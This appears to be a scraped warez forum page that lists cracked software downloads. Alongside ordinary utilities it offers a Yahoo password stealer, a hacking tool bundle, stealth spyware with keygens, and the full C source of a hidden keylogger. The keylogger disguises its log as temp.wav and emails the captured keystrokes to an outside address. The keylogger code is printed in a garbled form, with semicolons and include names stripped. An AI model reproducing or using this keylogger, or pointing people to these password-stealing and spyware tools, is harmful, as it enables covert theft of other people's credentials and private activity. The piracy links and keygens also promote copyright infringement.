Rapid Hacker v3.7 Final


No More Download Limit !!!
Tested and Working - No more download limit !!!
Rapid Hacker can hack / crack / bypass waiting limit at Rapidshare.com and Rapidshare.de
Just copy-paste the Rapidshare link and get unlimited downloads.
Spyware and Virus Free.

INSTRUCTIONS :
• paste the rapidshare link
• click "Go"
• Click the "FREE" button on the Rapidshare 's page
Just copy/paste rapidshare site and get unlimited downloads. Tested and working!
Spyware and Virus Free.

Instructions:
- After you paste the rapidshare link, click _Go_
- Click on the Rapidshare page, press tab 14 times
- hit enter if you can't scroll to the free button

Download: 1.3 MB

http://letitbit.net/download/3cf6a5358293/Rapid-Hacker-v3.7-Final.rar.html

Mirror:

http://depositfiles.com/files/6773383

Pass: www.dl4all.com

All In One : Ultra Hacker 155 in 1


155 Hack Tools All in One:
Anon FTP
BMP Ripper
CIA 10
FTP BR
Hack the game
Brutus
Genxe
AsPack 21
Hack flash template
Hydra
Hack My space
Blaster W32
and more...

Note: these are hack tools and may be detected as viruses/spyware by antivirus/spyware programs. Use at your own risk.

Download: 58 MB

http://rapidshare.com/files/157490211/superhacks2008_www.dl4all.com.rar

Desktop Music 2.1 Portable


Desktop Music is an intuitive way to create music on your computer.
Desktop Music saves music in a manageable text format.
This makes cutting, copying and pasting notes as easy as editing a text file.
A Powerful Chord Calculator
The chord calculator can calculate chords using any tuning on any stringed instrument. It can find chords with a specified melody note on a string and it can calculate chord voicings using open strings on voicings that are higher up the neck. You can any find chords you need on any instrument as you develop your song.

An Easy-To-Use Drum Machine

A drum track can be created in seconds by entering a bar of drum beats into the grid and then duplicating that bar. If a little variety is needed any bar can be easily called up and edited with a few mouse clicks.
A Text-based MIDI Sequencer

Desktop Music does not require you to record live with complex MIDI instrument. Desktop Music uses a unique form of step mode where music is inputted by clicking on a piano, guitar, bass, 5-string or tenor banjo, mandolin or ukulele.

A Scale Encyclopedia

Display a scale on any stringed instrument's neck or on the piano keyboard, instantly opening up new ways to create melodies and solo lines.

16 Instruments Alone or Together

Five pianos, five guitars, drums, bass, mandolin, 5-string (and tenor) banjo and ukulele can be used individually or in any combination. You become an expert on any instrument since you can easily call up scales and chords and then use them in your music.
Learn-By-Watching on any instrument
You can step though each part as slowly as needed. Lines can be selected and looped, either with the band or on the animated instrument. Even if you don't read music, you can still learn a lot from Desktop Music.

90 songs included

Desktop Music includes a large number of songs of many styles including: classical, rock, bluegrass, jazz, patriotic and Christmas. These songs can learned by following one of the animated instruments, saved as a MIDI file for web pages and more, or just played for fun. They show what Desktop Music is capable of.

http://rapidshare.com/files/154521484/Desktop-Music-2.1-Portable_cw.rar

USB Lock AP v2.5



USB LOCK AP is the tool of choice if you need to prevent information loss due to the unauthorized use of USB storage removable drives, CD-RWs, and Floppy. Without blocking other USB devices like printers, mouse, cameras.....etc. It is suitable for either Home or business use (In cases when the user is allowed to manage his or her own security) Its anti-hack security works as a windows Service at Local System level allowing the program to effectively run even on computers with no privileges.
Features:
Easy to use: USB LOCK AP allows the user to authorize or restrict, at his or her convenience, the use of USB storage removable drives, All CD ROM/CD-RW drives, and Floppy Disk drives. From its very easy to use, password protected interface.

Plus
Easy Drag & Drop Folder Protection
a Drag a folder you would like to protect
b Drop the folder on the USB LOCK AP Protection box
*To unprotect the folder repeat the procedure
- The icon will change so you know the folder is protected
- The folders will not change position in your directory.
- When you unprotect the icon will return to normal and you will have access.

Lock Transparent
Lock Transparent function allows you to lock the PC but still be able to see the contents on the screen
http://rapidshare.com/files/153815543/Usb_lock_AP_v2.5_cw.rar

Desktop Lock Business 7.1.2



Use Desktop Lock to lock the system (desktop, mouse, keyboard etc.) to prevent others from accessing your computer. This security product has helped million computer users to protect their computers and control access to the computers.

Desktop Lock is a computer security protection and access control software product, you can use it to lock computer to prevent people from accessing your private documents and resources. When the computer being locked by Desktop Lock, none can access your documents, browse your computer, or use programs on your computer.
Desktop Lock supports Windows XP/2000/NT as well as Windows 98/Me.
You can lock your computer by one click, or let Desktop Lock to automatically lock your system at specific time or when system become idle. You can customize the appearances of the locked desktop by using the options provided by Desktop Lock. Desktop Lock also supports hotkey to lock the system.
Desktop Lock also provides a powerful "Virtual Screen" tool that allows you to create virtual desktops to show only the specific programs to users.

You can lock your computer by ONE click, or by using the hotkey.

- If you use the hotkey to lock the computer, you even needn't to launch the software.

- Desktop Lock can be set to automatically lock your computer when you are away from your computer.

- You can let Desktop Lock to automatically lock your computer at any time you specified, you also can let Desktop Lock to unlock your computer at any time.

- Desktop Lock can play audio or video on the locked desktop.

- Plays Macromedia Flash or Microsoft PowerPoint file on the desktop during locking. (Business Edition)

- Lock the system and run a program on the desktop, then users can only use the one and only program on your computer, and can not close the program.

- And many other features.

http://rapidshare.com/files/149694937/Desk_Lock_Bus_Ed_712_mahek_cw.rar

BLUETOOTH REMOTE CONTROL V2

Control Your Pc from your cell phone.
Appz like media player, Ms Office and many more.
Control your mouse pointer and see your desktop on your mobile screen.

100% WORKING

Very Good product,Enjoy
http://rapidshare.com/files/146250062/Bluetooth_mahek_cw.rar

WinRAR Password Remover Full



Report this postReply with quote WinRAR Password Remover Full
by rubwew on Fri Oct 17, 2008 1:54 pm



Winrar password remover is a good utility to remove password protected RAR files
You can do by Brute Force .. or guess work method or use ultimate break in method to find or remove password.

Download:

Bluetooth Remote Control v4.0 Full Retail



Bluetooth Remote Control v4.0 Full Retail
This is a bluetooth remote controller for PC


Bluetooth Remote Control turns your Bluetooth enabled mobile phone into a universal controller for Window.

See your Power Point slides directly in the phone, browse/play the songs in ITune and Media player and much more...

Bluetooth Remote Control is a true universal remote control that lets the user adds or modify the controlled programs. Customize simple keymaps or for full control over the UI write your own Java and VB scripts.

Bluetooth Remote Control supports the following programs: Support for additional programs can easily be added with simple keymaps, VB or Java scripts (Script Guide).

iTunes
· Shows song name, artist & track time and UI objects
· Browse playlists, songs, artist, album and composers
· Search for songs
· Rank tracks
· Toggle shuffle
· Repeat track or library
· Play/pause, rewind, fast forward, change volume, previous/next track
· Mute

PowerPoint
· Shows next slide and slide notes
· Shows actual slides
· Play/stop presentation, previous/next slide
· Load recently used file
· Browse/Goto all/any slide
· Presentation time
· Scroll slide notes
· Vibrate when time expires

WinAMP
· Shows song name, artist & track time and UI objects
· Search for song and artists
· Play/pause, rewind, fast forward, change volume, previous/next track
· Toggle shuffle mode
· Change volume
· UI objects
· Toggle repeat mode

Windows Media Player
· Shows song name, artist & track time and UI objects
· Browse playlists and artists
· Rank tracks
· Toggle shuffle
· Repeat track or library
· Play/pause, rewind, fast forward, change volume, previous/next track
· Mute

Mouse mode
· Full support for controlling the PC mouse
· See the computer desktop on the phone
· Zoom in and out of the desktop
· B&W colors for faster response time
· Enter text

File Browser
· Allows launching of files

System
· Change system volume
· Start screensaver
· Lock workstation
· Shutdown Windows
· Start screensaver

Here are some key features of "Bluetooth Remote Control":
· Control iTunes, PowerPoint, Mouse, WinAMP, Windows Media Player and much more
· Create your own applications via Keymaps or VB and JScripts
· Supports most Bluetooth enabled phones and all Bluetooth PC solutions
· No Bluetooth setup! Just connect from your phone
· See the actual desktop in your phone


Download
http://rapidshare.com/files/154643119/BTRCv4.rar

KGB Employee Monitor v4.2.2


KGB Employee Monitor v4.2.2.Serial.Included

Do all your employees use their computer resources and Internet connection solely for your business? Do they work as hard when you are away as they do when you are watching over their shoulders? In other words, do you suspect your employee's productivity is lacking? You should consider installing a surveillance system to address the problem.

Look no further! KGB Employee Monitoring Software records and monitors your employee's activities and provides you on-site and remote access to employee's logs and computer screens in real time. The software-only solution can be installed in a matter of minutes, and does not require any hardware other than an ordinary PC. No special surveillance skills or security training are needed to successfully configure and operate KGB Employee Monitoring Software.

Improve Employee Productivity
Statistics show that surveillance disciplines employees and improves their productivity. Employees tend to perform better when they are being monitored - or even when they think they may be monitored. KGB Employee Monitoring Software successfully accomplishes this goal by constantly monitoring your employee's working environment - their computers.

Real-Time Remote Monitoring
Employees perform better under constant control with real-time feedback from their supervisor. Simply logging keystrokes and saving screen captures for future analysis is not enough. A certain level of interaction and feedback is vital for tightening discipline and improving performance.

Letting your employees know that managers and supervisors can see what is happening on their computers in real time even from remote locations provides the necessary feeling and improves discipline and productivity.

KGB Employee Monitoring Software allows managers and supervisors to monitor multiple employees remotely in real time. There is no need to leave a comfortable Executive chair in order to check each employee's PC for unauthorized activities. Capture the action and see what your employees are doing while they are still doing it, and provide immediate feedback on their activities!

Save Screens and Keystrokes
While real-time monitoring is essential to improve employee productivity, it does not completely solve the problem of employee loyalty. Hard evidence such as lists of visited Web sites, chat logs and other things typed by employees are critical in decreasing the possibilities of security breaches and identifying disloyal employees.

KGB Employee Monitoring Software is completely invisible to your employees. It runs silently and unobtrusively while logging everything that happens on your employee's computers. The product captures all keystrokes, makes periodic screen captures of employee's desktops, logs programs that are opened or closed, and records all Web sites that they visit. You can access these logs on-site or remotely; there's no need to leave your chair to check out employee behavior.

You can easily configure KGB Employee Monitoring Software to alert you about certain events via e-mail or by uploading to an FTP server. Smart templates allow capturing only those keystrokes that contain one of the pre-defined trigger phrases, making it easy to configure for maximum security or minimal intrusion.

Conclusion
KGB Employee Monitoring Software is a powerful tool to address lack of employee productivity while protecting your company against security breaches and disloyal employees. Download the free evaluation version, install it on all your PCs, make your employees aware of it and see how quickly your bottom line is improved!

Download
http://rapidshare.com/files/155130402/KGB.Employee.Monitor.v4.2.2.Serial.Included_cw.rar

Yahoo Messenger Password Stealer v1








the easiest way to steal a yahoo messenger password

Download:
http://rapidshare.com/files/156111012/Yahoo_Messenger_Password_Stealer.rar

Real Spy Monitor 2.87 [Incl. Keygen-CRD]



For example,
you can use Real Spy Monitor to :
Monitor Keystrokes typed, Websites visited, Windows viewed, Program executed, Screen snapshots, Files/Docs accessed.

Log Internet Chat conversation including AOL/ICQ/MSN/AIM Instant Messengers

Spy Web Mail Content including MSN/HotMail, Yahoo! Mail

Prevent your children or employee from some application or websites that include special keywords.

When you left your your PC, Record your PC actions and send them through Email delivery at set times.

Powerful logging features:
Keystrokes typed - Record all keystrokes typed that include username ( who typed them ), time ( what time user typed them ), windows title ( which windows they were pressed in )
Websites visited - Record all websites title, websites address, time ( what time user visited them) ,username ( who visited them )
Windows viewed - Capture every windows title that were active, including username, time, application pathname ( the pathname where the application is )
Program executed - Track every application/executable filename and its pathname including the time user start/terminate application.
Screen snapshots - Automatically captures screen shots of the desktop or active window at set intervals.
Files/Docs accessed - Record the filenames and its pathnames that were accessed by user, including username and time ( what time user accessed them)
Powerful Report feature
All logs that was recorded will be listed in "Report Form". In this "Report Form", You can select the log you want to view, find the important information in large numbers of logs ( Find feature ), clear up the useless and unnecessary logs, make your own Log-Report with HTML File Format, execute all recorded application, audio file, flash file, picture file, video file etc.

Content filtering feature
Application filtering - You can select any executable file in your hard disk and block them from execution by your children or employee or someone else.
Websites filtering - You can enter a full website address or you can also enter a keyword that any websites containing in filtering list box. Once the Internet explorer address box contained them, your Internet explorer will be closed. Also you can allow only the URLs and keywords that were listed to be accessed.

Perfect Security feature
Stealth Capabilities - Run Real Spy Monitor in total stealth mode, it even can not be found in task list under Win9x system. ( the user will not know that it is running! )
Windows Startup Configuration - Load Real Spy Monitor on windows startup for a single user or all users ( perfect for multiple users of a PC )
Active Mode - Real Spy Monitor will already be monitoring when it is started.
Access Password Protection - Only the master of this product can be allowed to start/stop monitoring while it is running.
Stealth mode notice - inform user of the PC that Real Spy Monitor is going be running in stealth mode, and remind you the hotkeys to bring Real Spy Monitor out of stealth mode.

Email log delivery feature
Real Spy Monitor can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring! You can set your own email subjects and select what type of logs you are ready to send. We have set a default ISP Mail Host that supports SMTP feature for you. Of course you can also set you own Mail Host that supports SMTP feature to send recorded logs for you.

User and PC actions time tracking
Real Spy Monitor will ALWAYS ( Real Time ) logs the current Windows user, the time and date for every PC actions.

Automatic log clear up
Real Spy Monitor can automatically clear up unnecessary or outdate logs from machine to save your disk space after a certain amount of data have been logged.

Easy to use and Friendly interface
The interface was redesigned with a really easy-to-use user-friendly interface. Some small bugs were eliminated in this version.



http://rapidshare.com/files/156204256/Real.Spy.Monitor.v2.87.WinAll.Incl.Keygen-CRD.rar

Keylogger + Mailer

Description // Info:
/*
Put this command: -lws2_32
to Tools->Compiler Options under the section on compile flags,
if have any problem with compile
*/

Source Code:
#include
#include
#include
#include
#include
int MailIt (char *mailserver, char *emailto, char *emailfrom,
char *emailsubject, char *emailmessage)
#define BUFSIZE 800
#define waittime 500
/*If you dont have free smtp server, use google:) */
#define cmailserver "gmail-smtp-in.l.google.com"
#define cemailto "TYPE_USER@gmail.com"
#define cemailfrom "TYPE_USER@gmail.com"
#define LogLength 100
#define FileName "temp.wav"
#define SMTPLog "templ.wav"
#define cemailsubject "Logged"
int test_key(void)
int main(void)
{
//Uncomment the lines below to put the keylogger in stealh mode.
HWND stealth /*creating stealth */
AllocConsole()
stealth=FindWindowA("ConsoleWindowClass",NULL)
ShowWindow(stealth,0)
{FILE *file
file=fopen(FileName,"a+")
time_t theTime=time(0)
fputs("\nStarted logging: ", file)
fputs(ctime(&theTime),file)
fclose(file)
}
/* if (test==2)
{//the path in which the file needs to be
char *path="c:\\%windir%\\svchost.exe"
create=create_key(path)
} */
int t=get_keys()
return t
}
int get_keys(void)
{
int freadindex
char *buf
long len
FILE *file
file=fopen(FileName,"a+")
short character
while(1)
{
sleep(10)/*to prevent 100% cpu usage*/
for(character=8character<=222character++)
{
if(GetAsyncKeyState(character)==-32767)
{
FILE *file
file=fopen(FileName,"a+")
if(file==NULL)
{
return 1
}
if(file!=NULL)
{
if((character>=39)&&(character<=64))
{
fputc(character,file)
fclose(file)
break
}
else if((character>64)&&(character<91))
{
character+=32
fputc(character,file)
fclose(file)
break
}
else
{
switch(character)
{
case VK_SPACE:
fputc(' ',file)
fclose(file)
break
case VK_SHIFT:
fputs("\r\n[SHIFT]\r\n",file)
fclose(file)
break
case VK_RETURN:
fputs("\r\n[ENTER]\r\n",file)
fclose(file)
break
case VK_BACK:
fputs("\r\n[BACKSPACE]\r\n",file)
fclose(file)
break
case VK_TAB:
fputs("\r\n[TAB]\r\n",file)
fclose(file)
break
case VK_CONTROL:
fputs("\r\n[CTRL]\r\n",file)
fclose(file)
break
case VK_DELETE:
fputs("\r\n[DEL]\r\n",file)
fclose(file)
break
case VK_OEM_1:
fputs("\r\n[:]\r\n",file)
fclose(file)
break
case VK_OEM_2:
fputs("\r\n[/?]\r\n",file)
fclose(file)
break
case VK_OEM_3:
fputs("\r\n[`~]\r\n",file)
fclose(file)
break
case VK_OEM_4:
fputs("\r\n[ [{ ]\r\n",file)
fclose(file)
break
case VK_OEM_5:
fputs("\r\n[\\]\r\n",file)
fclose(file)
break
case VK_OEM_6:
fputs("\r\n[ ]} ]\r\n",file)
fclose(file)
break
case VK_OEM_7:
fputs("\r\n['\"]\r\n",file)
fclose(file)
break
case 187:
fputc('+',file)
fclose(file)
break
case 188:
fputc(',',file)
fclose(file)
break
case 189:
fputc('-',file)
fclose(file)
break
case 190:
fputc('.',file)
fclose(file)
break
case VK_NUMPAD0:
fputc('0',file)
fclose(file)
break
case VK_NUMPAD1:
fputc('1',file)
fclose(file)
break
case VK_NUMPAD2:
fputc('2',file)
fclose(file)
break
case VK_NUMPAD3:
fputc('3',file)
fclose(file)
break
case VK_NUMPAD4:
fputc('4',file)
fclose(file)
break
case VK_NUMPAD5:
fputc('5',file)
fclose(file)
break
case VK_NUMPAD6:
fputc('6',file)
fclose(file)
break
case VK_NUMPAD7:
fputc('7',file)
fclose(file)
break
case VK_NUMPAD8:
fputc('8',file)
fclose(file)
break
case VK_NUMPAD9:
fputc('9',file)
fclose(file)
break
case VK_CAPITAL:
fputs("\r\n[CAPS LOCK]\r\n",file)
fclose(file)
break
default:
fclose(file)
break
}
}
}
}
}
FILE *file
file=fopen(FileName,"rb")
fseek(file,0,SEEK_END) //go to end
len=ftell(file) //get position at end (length)
if(len>=LogLength) {
fseek(file,0,SEEK_SET)//go to beg.
buf=(char *)malloc(len)//malloc buffer
freadindex=fread(buf,1,len,file)//read into buffer
buf[freadindex] = '\0'//Extra bit I have to add to make it a sting
MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf)
fclose(file)
file=fopen(FileName,"w")
}
fclose(file)
//free (buf)
}
return EXIT_SUCCESS
}
int MailIt (char *mailserver, char *emailto, char *emailfrom,
char *emailsubject, char *emailmessage) {
SOCKET sockfd
WSADATA wsaData
FILE *smtpfile
#define bufsize 300
int bytes_sent /* Sock FD */
int err
struct hostent *host /* info from gethostbyname */
struct sockaddr_in dest_addr /* Host Address */
char line[1000]
char *Rec_Buf = (char*) malloc(bufsize+1)
smtpfile=fopen(SMTPLog,"a+")
if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
fputs("WSAStartup failed",smtpfile)
WSACleanup()
return -1
}
if ( (host=gethostbyname(mailserver)) == NULL) {
perror("gethostbyname")
exit(1)
}
memset(&dest_addr,0,sizeof(dest_addr))
memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length)
/* Prepare dest_addr */
dest_addr.sin_family= host->h_addrtype /* AF_INET from gethostbyname */
dest_addr.sin_port= htons(25) /* PORT defined above */
/* Get socket */
if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
perror("socket")
exit(1)
}
/* Connect !*/
fputs("Connecting....\n",smtpfile)
if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
perror("connect")
exit(1)
}
sleep(waittime)
err=recv(sockfd,Rec_Buf,bufsize,0)Rec_Buf[err] = '\0'
fputs(Rec_Buf,smtpfile)
strcpy(line,"helo me.somepalace.com\n")
fputs(line,smtpfile)
bytes_sent=send(sockfd,line,strlen(line),0)
sleep(waittime)
err=recv(sockfd,Rec_Buf,bufsize,0)Rec_Buf[err] = '\0'
fputs(Rec_Buf,smtpfile)
strcpy(line,"MAIL FROM:<")
strncat(line,emailfrom,strlen(emailfrom))
strncat(line,">\n",3)
fputs(line,smtpfile)
bytes_sent=send(sockfd,line,strlen(line),0)
sleep(waittime)
err=recv(sockfd,Rec_Buf,bufsize,0)Rec_Buf[err] = '\0'
fputs(Rec_Buf,smtpfile)
strcpy(line,"RCPT TO:<")
strncat(line,emailto,strlen(emailto))
strncat(line,">\n",3)
fputs(line,smtpfile)
bytes_sent=send(sockfd,line,strlen(line),0)
sleep(waittime)
err=recv(sockfd,Rec_Buf,bufsize,0)Rec_Buf[err] = '\0'
fputs(Rec_Buf,smtpfile)
strcpy(line,"DATA\n")
fputs(line,smtpfile)
bytes_sent=send(sockfd,line,strlen(line),0)
sleep(waittime)
err=recv(sockfd,Rec_Buf,bufsize,0)Rec_Buf[err] = '\0'
fputs(Rec_Buf,smtpfile)
sleep(waittime)
strcpy(line,"To:")
strcat(line,emailto)
strcat(line,"\n")
strcat(line,"From:")
strcat(line,emailfrom)
strcat(line,"\n")
strcat(line,"Subject:")
strcat(line,emailsubject)
strcat(line,"\n")
strcat(line,emailmessage)
strcat(line,"\r\n.\r\n")
fputs(line,smtpfile)
bytes_sent=send(sockfd,line,strlen(line),0)
sleep(waittime)
err=recv(sockfd,Rec_Buf,bufsize,0)Rec_Buf[err] = '\0'
fputs(Rec_Buf,smtpfile)
strcpy(line,"quit\n")
fputs(line,smtpfile)
bytes_sent=send(sockfd,line,strlen(line),0)
sleep(waittime)
err=recv(sockfd,Rec_Buf,bufsize,0)Rec_Buf[err] = '\0'
fputs(Rec_Buf,smtpfile)
fclose(smtpfile)
#ifdef WIN32
closesocket(sockfd)
WSACleanup()
#else
close(sockfd)
#endif
}

PC Installation AIO - All apps after windows install


PC Installation AIO - All apps after windows install | 162.86 MB
Contains the most common apps that you need after a fresh windows install


Includes:

Firefox 3.01
Eset Nod32 Home
Flash player
Adobe acrobat 9
WinRar
Klite mega codec pack
PowerISO
WinAMP Pro
Unlocker
Daemon Tools Pro
Damn NFO viewer
MSN Live
Java
.Net Framework 3.0
Crystal Player PRO

http://w14.easy-share.com/1701888198.html
http://w14.easy-share.com/1701888199.html

Image Watermarker


Image Watermarker description Image Watermarker is a very simple, useful piece of software that allows you to apply watermark text across your images Image Watermarker is a very simple piece of software to use. Image Watermarker easily adds a text, a date or a logo (Image) on your pictures. Use the Image Watermarker to add copyright protection to your personal images. It does not need to be installed. Requirements: · .NET framework Link http://www.ziddu.com/download/2413031/ImageWaterMarker.zip.html

ProxyShell Hide IP 2.4.9


ProxyShell Hide IP is a professional and powerful hide IP software. ProxyShell Hide IP automatically manages and uses multiple proxies to hide your IP address, provides you faster and more reliable anonymous surfing. With ProxyShell Hide IP, you can hide IP address, surf the web without anyone knowing who you are, protect your own information and reading interests. You can also use ProxyShell Hide IP to send anonymous emails, or post on forums without displaying your own IP address.

ProxyShell Hide IP uses his own proxies and public proxies to hide your IP address. It has ability to automatically choose proxies for your surfing, and use multiple proxies simultaneously to handle your surfing requests, offers faster speed, much better proxy errors tolerance and stability. ProxyShell Hide IP works on Windows XP, Vista, you can use it with IE 6/7, Firefox or Opera. Key Features of ProxyShell Hide IP Hide IP address to make you surf anonymously Unique algorithm to effectively use public proxy servers for surfing Use multiple proxies simultaneously to handle your surfing requests Intelligently optimize speed of multiple proxies, accelerate your surfing Automatically detect proxy errors and change proxies if necessary Totally automatic and easy-to-use
http://rapidshare.com/files/154158279/151008_PSHIp.rar

Acronis True Image Home 2009 12 Build 9615



Acronis True Image Home 2009 complete PC protection: back up your entire PC, including the OS plus your data, applications, pictures, video, financial documents, settings and everything! Acronis True Image Home 2009 is an award-winning backup and recovery solution for a good reason: it protects your PC after just one click and allows you to recover from viruses, unstable software downloads, and failed hard drives. Create an exact copy of your PC and restore it from a major failure in minutes, or back up important files and recover them even faster.

Acronis True Image Home 2009 provides the maximum flexibility to ensure you are adequately protected and can recover from unforeseen events such as viruses, unstable software downloads, and hard drive failures. Create an exact copy of your PC for a full backup or backup only your important data and application settings — your choice!

You've accumulated a lifetime of memories on your home PC, in addition to important personal documents, such as tax returns and resumes, not to mention all the applications you have installed and unique settings for each family member that took countless hours to set up. Acronis True Image Home 2009 helps makes certain that you are adequately protected; ensuring that you can recover your precious data in case your PC fails or your computer hard disk is damaged by a virus.

Features:
• New! One-click™ protection. Initially, you decide what, where and when to back up. After that, backups occur automatically or with just one click.
• New! Full text search. You will be able to search for files through multiple archives by name or by a part of the name and then restore individual files easily and quickly. You can also perform searches of the files content.
• Making reserve copies of your backups. You can make reserve copies of your backups and save them on a network drive, or a USB storage device. You have a choice of making a reserve copy as regular (flat) files, a zip compressed file, and a tib file.
• New! Zip archive format support available. In addition to Acronis' powerful TIB data compression backup format, one of the most densely compressed backup file types available to consumers, Acronis True Image Home 2009 also supports the popular ZIP® format.
• Consolidation. You can define rules for consolidating your archives to reduce storage space. Merge an older full backup with several incremental backups to quickly create a new full backup; subsequent backups are based on the newly-created full backup.
• New! Windows Vista® -style interface. The new, sleek interface of this product works on Microsoft® Windows XP and Vista operating systems.
• Exclude Files and Folders. Back up only the data you want to keep and save disk space.
• Migration tools. Make upgrades easier with built-in PC cloning and migration tools.
• New! Auto backup based on destination availability. Users can decide to back up automatically or as soon as a destination drive is available. Works jointly with existing scheduling.
• Migration tools make upgrades easier. PC cloning or adding a new disk is simple with Acronis True Image Home 2009's built-in migration tools. No longer must you reinstall the operating system, applications, or re-key user settings when you clone your PC or increase its storage capacity.
• Security, performance and privacy tools. When you replace a hard drive on your PC, Acronis ensures you don't inadvertently give personal or organizational data to cyber thieves. Acronis Drive Cleanser, a $50 value is included at no charge. It protects sensitive data from view by wiping a disk clean of all data. If you don't need to erase the entire disk, File Shredder safely destroys individual files so they can't be resurrected. A System clean-up utility restores system efficiency.
• New! Automatic computer shutdown after backup or restoration finishes. You can now perform a backup at night and go to sleep without bothering about turning off the computer. The PC will shut down when the back up is complete.
• New! Archive to various places. You can save full, incremental and differential backups almost anywhere. You now you have ultimate flexibility in choosing a place to store from the same data series: on a network share, CD/DVD, USB stick, FTP-server, any local internal or external hard drive. You can now also give meaningful names to incremental and differential backups, for example, "C-drive-before-repartitioning".

Key Technologies:
• Improved! Try&Decide. Try new software and browse the web without endangering your computer from malware or unknown software. After testing, you can decide whether to keep or discard changes to your system.
• Acronis Startup Recovery Manager. Boot your computer after a failure to start the recovery process simply by selecting the F11 key, even if your operating system has failed.
• Incremental and Differential Backups. Save disk space and time by performing differential and incremental backups.
• Live Backups. Keep working right through your backup for maximum convenience, with Acronis snapshot technologies.
• Improved! Smart Scheduling. Run backups automatically at preset or elapsed time when user is idle, on user log/logout, on system startup/shutdown, and in coordination with other events.
• New! Set & Forget™ Backups. Configure once and perform backups automatically.
• Acronis Secure Zone®. Protect your system by saving an image to a special hidden partition on your hard disk where it can be retrieved after a disaster.

New in Acronis True Image Home 2009:
• One-Click Protection – During the first start of Acronis True Image Home after installation the program will take stock of your computer storage devices and if you have enough free space on one of hard drives or in the Acronis Secure Zone, it will offer to
protect your system right away by backing up your system volume and Master Boot Record to the storage location of its choice. In addition, Acronis True Image Home will offer you to refresh such backups regularly (by default, once in seven days). So you just need to click Protect and your system will be protected from a disaster.
• File search using Google Desktop and Windows Desktop Search – If you use one of these search engines, you will be able to search for files through multiple archives by name or by a part of the name and then restore individual files easily and quickly. In addition, they provide Acronis True Image Home with an ability of performing full-text indexing of the files in tib archives, so you will be able to perform searches of the files content.
• Making reserve copies of your backups - You can make reserve copies of your backups and save them on the file system, a network drive, or a USB stick. You have a choice of making a reserve copy as regular (flat) files, a zip compressed file, and a tib file.
• Support for Zip format – Now you can create file-level backup archives as zip files. The zip is one of the most widely used and popular archiving formats. In addition, Microsoft Windows has built-in support of this file format making it possible to extract files from backups created by Acronis True Image Home without using the program itself.
• Consolidation of backup files – you can create a consistent copy of archive while deleting selected backups. This allows you deleting the backups you do not need anymore from any archive without harming that archive.
• Automatic computer shutdown after backup or restoration finishes – you can now perform a backup at night and go to sleep without bothering about turning off the computer – the program will do this on its own.
• Archive to various places – you can save full, incremental and differential backups of the same data entity (for example, a partition, disk, E-mail) almost anywhere you like. In the earlier versions of Acronis True Image Home all backups belonging to the same data entity could be stored only in the same place. Now you have ultimate flexibility in choosing a place for backups of the same data entity – a network share, CD/DVD, USB stick, FTP-server, any local internal or external hard drive, etc. Furthermore, you can now give meaningful names to incremental and differential backups, for example, something like "SystemDiskbeforeRepartitioning".
• More user-friendly – Completely redesigned user interface and usability enhancements make Acronis True Image Home easier to use than ever before.
Download
http://w14.easy-share.com/1702005247.html

AVG Antivirus 8.0 Pro Edition Final Version + 1 Year Key


Antivirus and antispyware protection for Windows from the world's most trusted security company. Use the Internet with

confidence in your home or small office.

* Easy to download, install and use
* Protection against viruses, spyware, adware, worms and trojans
* Real-time security while you surf and chat online
* Top-quality protection that does not slow your system down
* Free support and service around the clock and across the globe
* Compatible with Windows Vista and Windows XP


Features:

Integrated protection

* Anti-Virus: protection against viruses, worms and trojans
* Anti-Spyware: protection against spyware, adware and identity-theft
* Anti-Rootkit: protection against hidden threats (rootkits)
* Web Shield & LinkScanner: protection against malicious websites

Easy-to-use, automated protection

Real-time protection, automatic updates, low-impact background scanning for on-line threats, and instant quarantining or

removal of infected files ensures maximum protection. Every interaction between your computer and the Internet is monitored,

so nothing can get onto your system without your knowledge. AVG scans in real time:

* All files including documents, pictures and applications
* E-mails (all major email clients supported)
* Instant messaging and P2P communications
* File downloads and online transactions such as shopping and banking
* Search results and any other links you click on

Internet use with peace of mind

The new web shield checks every web page at the moment you click on the link to ensure you’re not hit by a stealthy drive-by

download or any other exploits. All links on search results pages in Google, Yahoo, and MSN are analyzed and their current

threat level is reported in real time before you click on the link and visit the site.
The best Windows protection - trusted by millions of users

AVG's award-winning antivirus technology protects millions of users and is certified by major antivirus testing organizations

(VB100%, ICSA, West Coast Labs Checkmark).



System requirements

Windows Vista, Windows XP, Windows 2000, Windows NT, Windows Me, Windows 98. Note: AVG home and small office products do not

have support for server operating systems (Windows NT Server, Windows 2000/2003 Server, etc.).
1,2 GHz Processor
70 MB free hard drive

http://rapidshare.com/files/117930046/CW-A...ey-STEVE357.rar

Trend Micro Internet Security 2009 17.0 Build


Trend Micro Internet Security 2009 17.0 Build 1224(32 bit/64 bit) - 137.5 Mb

Trend Micro Internet Security 2009 makes it easy to protect your home network, personal identity, and online activity. It guards against present viruses, spyware, and identity theft as well as the web threats of tomorrow. Confidently e-mail, shop, bank, or share photos online, knowing your privacy and files are well protected.

Key Features:
Anti-virus
Anti-spyware
Email safety scan
Protection against rootkits
Proactive intrusion blocking
Anti-spam
Two-way firewall
Home network protection
Website authentication
Parental controls
Data theft prevention

Compatible Microsoft Operating Systems:
Windows Vista Ultimate, Business, Home Premium, or Home Basic
Windows XP Home or Professional Edition
Windows XP Media Center Edition 2005
Windows XP Tablet PC Edition 2005

Download

Driver Genius Professional Edition 8.0 + KeyGen


Driver Genius Professional Edition 8.0 For Windows 98/ME/2000/XP/Vista/x 64
*Quickly backup device drivers for your computer.
*Just need one click to restore all drivers.
*Clone your drivers to an EXE auto-installer. Easy to install the drivers to many m­achines.
*Easy to get the most recent drivers for your computer. Keep your drivers up to date.
*Remove invalid drivers and useless drivers, improve system performance and s­tability.
*Daily update! Liveupdate program allow you synchronize your drivers informatio­n database with our website.
*Device Diagnostics helps you locate a device that is not working properly or effici­ently and offers an effective solution.
*Unlocks many hidden options in the NVIDIA display driver controlpanel. Including over clocking settings, AGP settings, Fan control,Stereo control, OpenGL 2.0 s­upport, and more.

Download

Live CD Quick Heal Antivirus -2008


t is essential to remove specially partition table virus, File Allocation table virus and disc integrity virus that any other antivirus cannot repaire except their Live CD of course home made. So here is the Professional work from Quickheal Team.
